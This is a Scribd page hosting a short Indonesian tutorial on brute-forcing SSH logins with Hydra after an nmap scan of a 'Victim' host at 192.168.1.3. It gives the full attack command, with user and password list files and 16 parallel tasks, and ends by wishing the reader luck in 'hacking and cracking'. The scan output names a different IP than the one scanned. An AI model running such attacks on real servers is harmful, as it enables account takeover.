Scribd Logo
Загрузить

Добро пожаловать в Scribd!

  • Modul SSH Bruteforce Dengan Hydra

    Загружено:

    psycoproo
    97 просмотров3 страницы
    The document discusses using the Hydra tool to perform a brute force attack against SSH on a target server with IP address 192.168.1.3. It first uses Nmap to identify that the SSH service is open on port 22. It then shows the command used to run Hydra in parallel across 16 threads to crack SSH logins, using username and password lists provided in files stored in the /root directory. The goal is to discover valid login credentials for the SSH service on the target server through brute force.

    Исходное описание:

    Оригинальное название

    Modul Ssh Bruteforce Dengan Hydra

    Авторское право

    © © All Rights Reserved

    Доступные форматы

    PDF, TXT или читайте онлайн в Scribd

    Этот документ был вам полезен?

    Это неприемлемый материал?

    Пожаловаться на этот документ
    The document discusses using the Hydra tool to perform a brute force attack against SSH on a target server with IP address 192.168.1.3. It first uses Nmap to identify that the SSH service is open on port 22. It then shows the command used to run Hydra in parallel across 16 threads to crack SSH logins, using username and password lists provided in files stored in the /root directory. The goal is to discover valid login credentials for the SSH service on the target server through brute force.

    Авторское право:

    © All Rights Reserved
    Скачайте в формате PDF, TXT или читайте онлайн в Scribd
    Отметить как неприемлемый контент
    97 просмотров3 страницы

    Modul SSH Bruteforce Dengan Hydra

    Загружено:

    psycoproo
    The document discusses using the Hydra tool to perform a brute force attack against SSH on a target server with IP address 192.168.1.3. It first uses Nmap to identify that the SSH service is open on port 22. It then shows the command used to run Hydra in parallel across 16 threads to crack SSH logins, using username and password lists provided in files stored in the /root directory. The goal is to discover valid login credentials for the SSH service on the target server through brute force.

    Авторское право:

    © All Rights Reserved
    Скачайте в формате PDF, TXT или читайте онлайн в Scribd
    Отметить как неприемлемый контент
    из 3

    http://majalengka-cyber.hol.

    es/ Page 1



    MODUL
    BRUTEFORCE SSH DENGAN HYDRA















    www.majalengka-cyber.hol.es







    http://majalengka-cyber.hol.es/ Page 2

    root@drew:~# hydra
    Hydra v7.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
    Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE]
    [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT]
    [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]
    Options:
    -R restore a previous aborted/crashed session
    -S perform an SSL connect
    -s PORT if the service is on a different default port, define it here
    -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
    -p PASS or -P FILE try password PASS, or load several passwords from FILE
    -x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
    -e nsr try "n" null password, "s" login as pass and/or "r" reversed login
    -u loop around users, not passwords (effective! implied with -x)
    -C FILE colon separated "login:pass" format, instead of -L/-P options
    -M FILE server list for parallel attacks, one entry per line
    -o FILE write found login/password pairs to FILE instead of stdout
    -f exit after the first found login/password pair (per host if -M)
    -t TASKS run TASKS number of connects in parallel (default: 16)
    -w / -W TIME waittime for responses (32s) / between connects per thread
    -4 / -6 prefer IPv4 (default) or IPv6 addresses
    -v / -V verbose mode / show login+pass combination for each attempt
    -U service module usage details
    server the target server (use either this OR the -M option)
    service the service to crack. Supported protocols: cisco cisco-enable cvs firebird
    ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq
    imap irc ldap2 ldap3[-{cram|digest}md5] mssql mysql ncp nntp oracle-listener oracle-sid
    pcanywhere pcnfs pop3 postgres rdp rexec rlogin rsh sip smb smtp smtp-enum snmp
    socks5 ssh svn teamspeak telnet vmauthd vnc xmpp
    OPT some service modules need special input (use -U to see module help)
    Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
    for legal purposes! Find the newest version at http://www.thc.org/thc-hydra
    Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment
    for a proxy.
    The following services were not compiled in: sapr3 afp oracle.
    Examples:
    hydra -l john -p doe 192.168.0.1 ftp
    hydra -L user.txt -p secret 192.168.0.1 imap PLAIN
    hydra -l admin -P pass.txt http-proxy://192.168.0.1
    hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

    http://majalengka-cyber.hol.es/ Page 3

    kali ini contoh Victim berada pada IP 192.168.1.3 dan kali ini kita sedikit information gathering
    menggunakan nmap
    root@drew:~# nmap 192.168.1.3
    Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2013-04-28 13:07 WIT
    Nmap scan report for 192.168.1.80
    Host is up (0.0000040s latency).
    Not shown: 999 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    dari output di atas Service SSH open pada port 22 dan saatnya kita lakukan brute force pada
    service tersebut.
    root@drew:~# hydra -s 22 -S -L /root/userlist.txt -P /root/passlist.txt -t 16
    192.168.1.3 ssh
    Saya asumsikan user list dan password list berada pada directory root (tinggal sesuaikan saja)














    ~ Good Luck For Hacking And Cracking ~

    Вам также может понравиться